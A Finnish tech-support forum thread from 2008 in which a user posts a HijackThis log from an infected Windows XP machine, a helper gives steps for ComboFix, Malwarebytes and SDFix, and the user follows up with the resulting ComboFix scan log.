Hidas kone + kaatuileva explorer.exe - Hjt-log

Kolmatta kertaa tänä vuonna porukat onnistunu kuin ihmeen kaupalla täyttämään koneen kaikennäkösillä haitallisilla jutuilla.Mutta ilman turhia löpinöitä tässä Hjt-lokini, jos viitsisitte vilkaista:

-------------

Logfile of HijackThis v1.99.1
Scan saved at 17:25:06, on 26.8.2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sygate\smc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Avast4\aswUpdSv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\WINDOWS\system32\rundll32.exe
D:\BlueTooth\bin\btwdins.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
C:\HiJackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Linkit
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Ohjelmat\java\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Liven kirjautumisapuohjelma - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IntelliPoint] "C:\Program Files\Microsoft IntelliPoint\point32.exe"
O4 - HKLM\..\Run: [type32] "C:\Program Files\Microsoft IntelliType Pro\type32.exe"
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\smc.exe -startgui
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [nar] C:\WINDOWS\nar.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Lähetä &Bluetooth-laitteeseen - D:\BlueTooth\btsendto_ie_ctx.htm
O8 - Extra context menu item: Open Link Target in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewlink.html
O8 - Extra context menu item: View This Page in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewpage.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-4017 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {3B36B017-7E49-426B-95B0-B5CECD83C2E2} (IfolorUploader Control) - http://fika-web.ifolor.net/OrderingGeneral/LowRes/app_support/ActiveX/IfolorUploader_fika.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab32846.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab31267.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: widimg - {EE7C2AFF-5742-44FF-BD0E-E521B0D3C3BA} - C:\WINDOWS\system32\btxppanel.dll
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation - D:\BlueTooth\bin\btwdins.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\smc.exe

 

1.Lataa combofix.exe työpöydällesi yhdestä linkistä:
combofix1
combofix2

2. Tuplaklikkaa combofix.exe tiedostoa ja seuraa ohjeistuksia.
3. Kun työkalu on valmis, se tuottaa lokin. Lähetä tämä loki viesti ketjuusi.
Huom! Älä klikkaile combofixin ikkunaa käytön aikana. Tämä saattaa aiheuttaa ohjelman jumiutumisen.

===========

Lataa Malwarebytes' Anti-Malware työpöydällesi.

1. Tuplaklikkaa mbam-setup.exe ja seuraa ohjeita asentaaksesi ohjelman.
2. Lopuksi varmistu, että seuraavat on valittu: Update Malwarebytes', Anti-Malwareja
Launch Malwarebytes' Anti-Malware ja sen jälkeen klikkaaFinish.
3. Jos päivitys löytyy. ohjelma lataa ja asentaa uusimman version.
4. Kun ohjelma on latautunut, valitse Perform full scan ja klikkaa Scan.
5. Kun skanni on valmis, klikkaa OK ja sitten Show Results nähdäksesi tulokset.
6. Varmistu, että kaikki on merkitty ja klikkaa Remove Selected.
7. Tämän jälkeen loki avautuu muistioon. Tallenna se paikkaan, josta löydät sen helposti. Loki
löytyy myös täältä: C:\Documents and Settings\Käyttäjänimi\Application
Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-päiväys.txt
8. Lähetä lokin sisältö seuraavassa viestissäsi.

============

Lataa SDFix by AndyManchesta ja tallenna se työpöydällesi.

Käynnistä koneesi vikasietotilaan:

sammuta ja käynnistä
käynnistyksen yhteydessä hakkaa F8 nappia
valitse nuolinäppäimellä vikasietotila
paina enter ja enter
valitse käyttäjätilisi
paina kyllä

Jossakin koneissa hakataan F8:sin sijasta F5:tä

" Kun vikasietotilassa, pura tiedoston SDFix.zip sisältö (SDFix kansio) työpöydällesi. Työpöydälle pitäisi ilmestyä kansio nimeltä SDFix.
" Avaa SDFix-kansio ja tuplaklikkaa tiedostoa RunThis.bat käynnistääksesi ohjelman.
" Paina Y käynnistääksesi skriptin.
" Työkalu puhdistaa troijalaisen palvelut ja tekee myös joitakin korjauksia rekisteriin. Lopuksi se pyytää käynnistämään koneen uudelleen, "Press any key to Reboot".
" Paina mitä tahansa näppäintä ja kone käynnistyy uudelleen.
" Käynnistyminen kestää normaalia kauemmin sillä SDFix puhdistaa konetta.
" Kun kone on käynnistynyt ja työpöytä latautunut, SDFix kertoo että puhdistus on suoritettu, "Finished".
" Paina sitten mitä tahansa näppäintä sulkeaksesi skriptin ja ladataksesi pikakuvakkeet työpöydälle.
" Lopuksi avaa SDFix kansio (työpöydällä) ja kopioi & liitä tiedoston Report.txt sisältö viestiketjuusi uuden HijackThis:n lokin kera.

 

ComboFix 08-08-27.05 - Omistaja 2008-08-28 13:42:27.4 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1035.18.230 [GMT 3:00]
Running from: C:\Documents and Settings\Omistaja\Työpöytä\ComboFix.exe
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

(((((((((((((((((((((((((((((((((((((( Muut poistot ))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com\clearspring.sol
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com\ws\wan\wanLib.swf\481f8cb267605bfc.sol
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com\settings.sol

.
((((( Tiedostot, jotka on luotu seuraavalla aikavälillä: 2008-07-28 to 2008-08-28 )))))))))))))))))
.

2008-08-28 13:10 . 2008-08-28 13:19 <KANSIO> d-------- C:\WINDOWS\LastGood
2008-08-14 19:47 . 2008-05-01 17:35 331,776 -----c--- C:\WINDOWS\system32\dllcache\msadce.dll
2008-08-14 19:44 . 2008-04-11 22:05 691,712 -----c--- C:\WINDOWS\system32\dllcache\inetcomm.dll

.
(((((((((((((((((((((((((((((((((((( Find3M-raportti ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-08-28 10:21 --------- d-----w C:\Program Files\Mozilla Thunderbird
2008-08-26 13:00 --------- d-----w C:\Documents and Settings\Omistaja\Application Data\uTorrent
2008-08-20 16:49 17,920 ----a-w C:\Documents and Settings\Omistaja\Application Data\GDIPFONTCACHEV1.DAT
2008-07-18 19:10 94,920 ----a-w C:\WINDOWS\system32\cdm.dll
2008-07-18 19:10 53,448 ----a-w C:\WINDOWS\system32\wuauclt.exe
2008-07-18 19:09 563,912 ----a-w C:\WINDOWS\system32\wuapi.dll
2008-07-18 19:09 325,832 ----a-w C:\WINDOWS\system32\wucltui.dll
2008-07-18 19:09 205,000 ----a-w C:\WINDOWS\system32\wuweb.dll
2008-07-18 19:09 1,811,656 ----a-w C:\WINDOWS\system32\wuaueng.dll
2008-07-07 20:28 253,952 ----a-w C:\WINDOWS\system32\es.dll
2008-07-07 13:53 --------- d-----w C:\Program Files\Ahead
2008-06-24 16:44 74,240 ----a-w C:\WINDOWS\system32\SETBC.tmp
2008-06-24 07:29 3,592,192 ----a-w C:\WINDOWS\system32\SET10.tmp
2008-06-23 16:29 826,368 ----a-w C:\WINDOWS\system32\SET7.tmp
2008-06-23 16:29 63,488 ----a-w C:\WINDOWS\system32\SET1F.tmp
2008-06-23 16:29 6,066,176 ----a-w C:\WINDOWS\system32\SET18.tmp
2008-06-23 16:29 52,224 ----a-w C:\WINDOWS\system32\SET11.tmp
2008-06-23 16:29 459,264 ----a-w C:\WINDOWS\system32\SET12.tmp
2008-06-23 16:29 383,488 ----a-w C:\WINDOWS\system32\SET1A.tmp
2008-06-23 16:29 267,776 ----a-w C:\WINDOWS\system32\SET16.tmp
2008-06-23 16:29 233,472 ----a-w C:\WINDOWS\system32\SET8.tmp
2008-06-23 16:29 124,928 ----a-w C:\WINDOWS\system32\SET22.tmp
2008-06-23 16:29 105,984 ----a-w C:\WINDOWS\system32\SETA.tmp
2008-06-23 16:29 1,159,680 ----a-w C:\WINDOWS\system32\SET9.tmp
2008-06-20 17:47 246,784 ----a-w C:\WINDOWS\system32\mswsock.dll
2007-07-19 16:07 5,632 --sha-w C:\Program Files\Thumbs.db
2006-04-03 13:14 0 -c-ha-w C:\Documents and Settings\Omistaja\hpothb07.dat
2004-10-01 13:00 40,960 ----a-w C:\Program Files\Uninstall_CDS.exe
2008-05-19 19:18 7,474 --sha-r C:\WINDOWS\Nar.vbs
.

------- Sigcheck -------

2004-09-15 15:00 14336 34c8d42b876703b3abf0562307428561 C:\WINDOWS\$NtServicePackUninstall$\svchost.exe
2008-04-14 19:12 14336 6138d30346cf435d2bf32cbc1437f625 C:\WINDOWS\ServicePackFiles\i386\svchost.exe
2008-04-14 19:12 14336 6138d30346cf435d2bf32cbc1437f625 C:\WINDOWS\system32\svchost.exe

2005-03-02 21:20 577536 409647243875a2f91bae81cbef248cb6 C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\user32.dll
2007-03-08 18:50 578560 90f1d04938bae133e2f4d8f7f0fa4fa0 C:\WINDOWS\$hf_mig$\KB925902\SP2QFE\user32.dll
2007-03-08 18:38 578048 c198eac972598be7e61364f7db3b663d C:\WINDOWS\$NtServicePackUninstall$\user32.dll
2004-09-15 15:00 577536 44c02bc54d56ed3a685302e91396720a C:\WINDOWS\$NtUninstallKB890859$\user32.dll
2005-03-02 21:18 577536 aeefa9d983c986e7a8d6d80ca165b93f C:\WINDOWS\$NtUninstallKB925902$\user32.dll
2008-04-14 19:11 579072 9d0a78e87972b880c254241262108232 C:\WINDOWS\ServicePackFiles\i386\user32.dll
2008-04-14 19:11 579072 9d0a78e87972b880c254241262108232 C:\WINDOWS\system32\user32.dll

2004-09-15 15:00 82944 911c48bb2df21e2088c23260dd112e80 C:\WINDOWS\$NtServicePackUninstall$\ws2_32.dll
2008-04-14 19:11 82432 17f2addc53069471ea68528e5458ff2e C:\WINDOWS\ServicePackFiles\i386\ws2_32.dll
2008-04-14 19:11 82432 17f2addc53069471ea68528e5458ff2e C:\WINDOWS\system32\ws2_32.dll

2005-01-27 20:12 657920 9f621aa8e09012a4566480eda61c368c C:\WINDOWS\$hf_mig$\KB867282\SP2QFE\wininet.dll
2005-05-02 23:58 658944 75eea34c4afd5a983f5e6b660e5f1da2 C:\WINDOWS\$hf_mig$\KB883939\SP2QFE\wininet.dll
2005-09-03 03:08 660480 2983c9ae18e389c328a349f572f1aaad C:\WINDOWS\$hf_mig$\KB896688\SP2QFE\wininet.dll
2005-07-03 05:11 659456 042e7a572b55af4b7d11a6a8a5179f8c C:\WINDOWS\$hf_mig$\KB896727\SP2QFE\wininet.dll
2005-10-21 06:39 661504 27c407d0527b18201f1f2927d39b246f C:\WINDOWS\$hf_mig$\KB905915\SP2QFE\wininet.dll
2006-03-04 06:58 663552 0b5f9971aa3522edeca79fd34619652f C:\WINDOWS\$hf_mig$\KB912812\SP2QFE\wininet.dll
2006-05-10 08:27 663552 c4e5a8f0cdeb3ae634ec96b5c5a5715e C:\WINDOWS\$hf_mig$\KB916281\SP2QFE\wininet.dll
2006-06-23 14:25 664576 ed19f0e21afc6ad5f7b206be851f662b C:\WINDOWS\$hf_mig$\KB918899\SP2QFE\wininet.dll
2006-09-14 11:37 664576 f24d8577ec89d6ad405ea85eb51285d7 C:\WINDOWS\$hf_mig$\KB922760\SP2QFE\wininet.dll
2007-03-23 12:29 823296 462f189562635461bd5f6917a0bbb3fc C:\WINDOWS\$hf_mig$\KB931768-IE7\SP2QFE\wininet.dll
2007-04-25 11:29 823808 c44d048452288b8e3d0d0c6668fec649 C:\WINDOWS\$hf_mig$\KB933566-IE7\SP2QFE\wininet.dll
2007-06-27 17:15 824320 2733e526118d99b6e034d8c4edd4d11e C:\WINDOWS\$hf_mig$\KB937143-IE7\SP2QFE\wininet.dll
2007-08-20 12:50 825344 576cda8ff35c88b4e53acc9247bb4ba6 C:\WINDOWS\$hf_mig$\KB939653-IE7\SP2QFE\wininet.dll
2007-10-11 02:23 825344 97448c39d6185a4514dda6c6a861a4e6 C:\WINDOWS\$hf_mig$\KB942615-IE7\SP2QFE\wininet.dll
2007-12-07 04:42 825344 4551eb7ab420af3db7eabd5a83c8100c C:\WINDOWS\$hf_mig$\KB944533-IE7\SP2QFE\wininet.dll
2008-03-01 15:35 827392 62b193606f56d6ceab6704af6a45774f C:\WINDOWS\$hf_mig$\KB947864-IE7\SP2QFE\wininet.dll
2008-04-23 07:21 827392 e56922cde1cb53087289c41cdabde9f9 C:\WINDOWS\$hf_mig$\KB950759-IE7\SP2QFE\wininet.dll
2008-06-23 18:40 827904 30b60fb6a1051e80a1054df25a4f9913 C:\WINDOWS\$hf_mig$\KB953838-IE7\SP2QFE\wininet.dll
2004-09-15 15:00 656384 24965d454199a92ee14f2f0e4374f89c C:\WINDOWS\$NtUninstallKB867282$\wininet.dll
2005-01-27 20:14 656896 ed5b97fbe98564a15ab191d21ab90bc4 C:\WINDOWS\$NtUninstallKB883939$\wininet.dll
2005-07-03 05:16 658432 062416aff780180023f2d6d0766551ef C:\WINDOWS\$NtUninstallKB896688$\wininet.dll
2005-05-02 23:56 657920 5689f1dd804b5ef9e2d843a17bbe8265 C:\WINDOWS\$NtUninstallKB896727$\wininet.dll
2005-09-03 03:05 658432 6d5f933f96eaeaf04e0824cb4c0dfa5d C:\WINDOWS\$NtUninstallKB905915$\wininet.dll
2005-10-21 06:41 658432 789ff5e1455d68cfb33278d8436045ac C:\WINDOWS\$NtUninstallKB912812$\wininet.dll
2006-03-04 06:35 658432 acba6baade5b46fb304a86d9fe718c7c C:\WINDOWS\$NtUninstallKB916281$\wininet.dll
2006-05-10 08:23 658432 881a657e894cd545b5de8f1ad645247c C:\WINDOWS\$NtUninstallKB918899$\wininet.dll
2006-06-23 14:11 658944 422270af6d8461851d20c843a64fba47 C:\WINDOWS\$NtUninstallKB922760$\wininet.dll
2006-09-14 11:39 658944 ece807a59d73b089a3be56fd78c9a7d3 C:\WINDOWS\ie7\wininet.dll
2006-11-07 22:03 818688 92995334f993e6e49c25c6d02ec04401 C:\WINDOWS\ie7updates\KB928090-IE7\wininet.dll
2007-01-12 10:27 822784 be43d00d802c92f01c8cc952c6f483f8 C:\WINDOWS\ie7updates\KB931768-IE7\wininet.dll
2007-02-27 16:32 822784 a316582e09c465750ed9061307004e50 C:\WINDOWS\ie7updates\KB933566-IE7\wininet.dll
2007-04-25 10:40 822784 d75ec9b36ec9d617906859341be701df C:\WINDOWS\ie7updates\KB937143-IE7\wininet.dll
2007-06-27 17:06 823808 d0435e210cb71a930a5491bc14714d81 C:\WINDOWS\ie7updates\KB939653-IE7\wininet.dll
2007-08-20 12:59 824832 5a88886d5958af9309b517897d02260c C:\WINDOWS\ie7updates\KB942615-IE7\wininet.dll
2007-10-11 02:52 824832 658bdbc46e45cd4cd7cd7896b6cf4e88 C:\WINDOWS\ie7updates\KB944533-IE7\wininet.dll
2007-12-07 05:14 824832 d0d4908912f67aad4cc6e8b0b1df39c9 C:\WINDOWS\ie7updates\KB947864-IE7\wininet.dll
2008-03-01 16:01 826368 a593abdc028e8ef0137ea953f84704b1 C:\WINDOWS\ie7updates\KB950759-IE7\wininet.dll
2008-04-23 07:16 826368 77f1c09d0cfc01d1b5740a999374fa33 C:\WINDOWS\ie7updates\KB953838-IE7\wininet.dll
2008-04-14 19:11 666112 805df36832d972480e4ec8adc5a85c9b C:\WINDOWS\ServicePackFiles\i386\wininet.dll
2008-06-23 19:29 826368 d8d46a9b69c6aedb8bb3b9b59ef56b23 C:\WINDOWS\SoftwareDistribution\Download\f4af3a1e346641861d114a1df25c12d2\SP2GDR\wininet.dll
2008-06-23 18:40 827904 30b60fb6a1051e80a1054df25a4f9913 C:\WINDOWS\SoftwareDistribution\Download\f4af3a1e346641861d114a1df25c12d2\SP2QFE\wininet.dll
2008-04-23 07:16 826368 77f1c09d0cfc01d1b5740a999374fa33 C:\WINDOWS\system32\wininet.dll
2008-06-23 19:29 826368 d8d46a9b69c6aedb8bb3b9b59ef56b23 C:\WINDOWS\system32\dllcache\wininet.dll

2005-05-25 22:07 359936 63fdfea54eb53de2d863ee454937ce1e C:\WINDOWS\$hf_mig$\KB893066\SP2QFE\tcpip.sys
2006-01-13 20:07 360448 5562cc0a47b2aef06d3417b733f3c195 C:\WINDOWS\$hf_mig$\KB913446\SP2QFE\tcpip.sys
2006-04-20 15:18 360576 b2220c618b42a2212a59d91ebd6fc4b4 C:\WINDOWS\$hf_mig$\KB917953\SP2QFE\tcpip.sys
2007-10-30 19:53 360832 64798ecfa43d78c7178375fcdd16d8c8 C:\WINDOWS\$hf_mig$\KB941644\SP2QFE\tcpip.sys
2008-06-20 14:59 361600 ad978a1b783b5719720cff204b666c8e C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\tcpip.sys
2007-10-30 20:20 360064 90caff4b094573449a0872a0f919b178 C:\WINDOWS\$NtServicePackUninstall$\tcpip.sys
2004-09-15 15:00 359040 9f4b36614a0fc234525ba224957de55c C:\WINDOWS\$NtUninstallKB893066$\tcpip.sys
2005-05-25 22:04 359808 88763a98a4c26c409741b4aa162720c9 C:\WINDOWS\$NtUninstallKB913446$\tcpip.sys
2006-01-13 05:28 359808 583e063fdc888ca30d05c2724b0d7ef4 C:\WINDOWS\$NtUninstallKB917953$\tcpip.sys
2006-04-20 14:51 359808 1dbf125862891817f374f407626967f4 C:\WINDOWS\$NtUninstallKB941644$\tcpip.sys
2008-04-13 22:20 361344 93ea8d04ec73a85db02eb8805988f733 C:\WINDOWS\$NtUninstallKB951748$\tcpip.sys
2008-04-13 22:20 361344 93ea8d04ec73a85db02eb8805988f733 C:\WINDOWS\ServicePackFiles\i386\tcpip.sys
2008-06-20 14:51 361600 9aefa14bd6b182d61e3119fa5f436d3d C:\WINDOWS\system32\dllcache\tcpip.sys
2008-06-20 14:51 361600 9aefa14bd6b182d61e3119fa5f436d3d C:\WINDOWS\system32\drivers\tcpip.sys

2004-09-15 15:00 502784 5f0714b1447dc0262789c3cc43752418 C:\WINDOWS\$NtServicePackUninstall$\winlogon.exe
2008-04-14 19:12 508416 76b238743be82d4cae1b7c95c898b6b6 C:\WINDOWS\ServicePackFiles\i386\winlogon.exe
2008-04-14 19:12 508416 76b238743be82d4cae1b7c95c898b6b6 C:\WINDOWS\system32\winlogon.exe

2004-09-15 15:00 182912 558635d3af1c7546d26067d5d9b6959e C:\WINDOWS\$NtServicePackUninstall$\ndis.sys
2008-04-13 22:20 182656 1df7f42665c94b825322fae71721130d C:\WINDOWS\ServicePackFiles\i386\ndis.sys
2008-04-13 22:20 182656 1df7f42665c94b825322fae71721130d C:\WINDOWS\system32\drivers\ndis.sys

2004-09-15 15:00 29056 4448006b6bc60e6c027932cfc38d6855 C:\WINDOWS\$NtServicePackUninstall$\ip6fw.sys
2008-04-13 21:53 36608 3bb22519a194418d5fec05d800a19ad0 C:\WINDOWS\ServicePackFiles\i386\ip6fw.sys
2008-04-13 21:53 36608 3bb22519a194418d5fec05d800a19ad0 C:\WINDOWS\system32\drivers\ip6fw.sys

2005-03-02 21:13 2059264 01f49730c2d76aad87c4d2b2dd4e12e2 C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\ntkrnlpa.exe
2006-12-19 21:45 2061696 8f3bbe9045dfe4d89b24552fcba0e8b2 C:\WINDOWS\$hf_mig$\KB929338\SP2QFE\ntkrnlpa.exe
2007-02-28 19:08 2061696 8bacc2a67078823acab7c8306f394918 C:\WINDOWS\$hf_mig$\KB931784\SP2QFE\ntkrnlpa.exe
2007-02-28 19:02 2059904 9f7bc4398e9a43f533ed4d8e690b1cd6 C:\WINDOWS\$NtServicePackUninstall$\ntkrnlpa.exe
2004-09-15 15:00 2059136 e6cbe47b5ea01ce981e4663900f04a15 C:\WINDOWS\$NtUninstallKB890859$\ntkrnlpa.exe
2005-03-02 21:08 2059136 1c09a92e5a1c21ca1ad367f13f9b5a9d C:\WINDOWS\$NtUninstallKB929338$\ntkrnlpa.exe
2006-12-19 21:22 2059904 09e0237ef89c06c44b8433733060573f C:\WINDOWS\$NtUninstallKB931784$\ntkrnlpa.exe
2008-04-14 18:49 2068224 fb43994013605429b57f7b1040f7c525 C:\WINDOWS\ServicePackFiles\i386\ntkrnlpa.exe
2008-04-14 18:49 2068224 fb43994013605429b57f7b1040f7c525 C:\WINDOWS\system32\ntkrnlpa.exe

2005-03-02 21:13 2181888 6e55b15ee58a0eaaaf20db1f4da39add C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\ntoskrnl.exe
2006-12-19 21:45 2184320 8f8898bc0cb9fd8c6b0a575367a977bd C:\WINDOWS\$hf_mig$\KB929338\SP2QFE\ntoskrnl.exe
2007-02-28 19:08 2184448 7ff07a634379ee2fd2b097fd76c49bfc C:\WINDOWS\$hf_mig$\KB931784\SP2QFE\ntoskrnl.exe
2007-02-28 19:02 2182656 6a51f190523074b729702923fac865f4 C:\WINDOWS\$NtServicePackUninstall$\ntoskrnl.exe
2004-09-15 15:00 2183296 2a8e38e78177bf83c73897511a4eecd0 C:\WINDOWS\$NtUninstallKB890859$\ntoskrnl.exe
2005-03-02 21:08 2181632 ae8d156d1028fba3939609f4c39eb1f1 C:\WINDOWS\$NtUninstallKB929338$\ntoskrnl.exe
2006-12-19 21:22 2182656 22a830ae087de7e3d72c4b1d9611bf6e C:\WINDOWS\$NtUninstallKB931784$\ntoskrnl.exe
2008-04-14 18:49 2191360 cb0343f73a320cd0fefebeefd946fc97 C:\WINDOWS\ServicePackFiles\i386\ntoskrnl.exe
2008-04-14 18:49 2191360 cb0343f73a320cd0fefebeefd946fc97 C:\WINDOWS\system32\ntoskrnl.exe

2008-04-14 19:12 1034240 0c35f47295002f8a06419744e945d670 C:\WINDOWS\explorer.exe
2007-06-13 16:10 1033728 fb53c3b1e17f62e8fcb07caaf4c4272e C:\WINDOWS\$hf_mig$\KB938828\SP2QFE\explorer.exe
2007-06-13 16:22 1033728 0f88a5b1ca666754c4c62ad3db4730ef C:\WINDOWS\$NtServicePackUninstall$\explorer.exe
2004-09-15 15:00 1032704 43c0b3d357f319875a51bc111f393147 C:\WINDOWS\$NtUninstallKB938828$\explorer.exe
2008-04-14 19:12 1034240 0c35f47295002f8a06419744e945d670 C:\WINDOWS\ServicePackFiles\i386\explorer.exe

2004-09-15 15:00 108544 c2f8f8343435fc080c2de25a410e09e8 C:\WINDOWS\$NtServicePackUninstall$\services.exe
2008-04-14 19:12 109056 e473263067492fc77f7690d4112caf16 C:\WINDOWS\ServicePackFiles\i386\services.exe
2008-04-14 19:12 109056 e473263067492fc77f7690d4112caf16 C:\WINDOWS\system32\services.exe

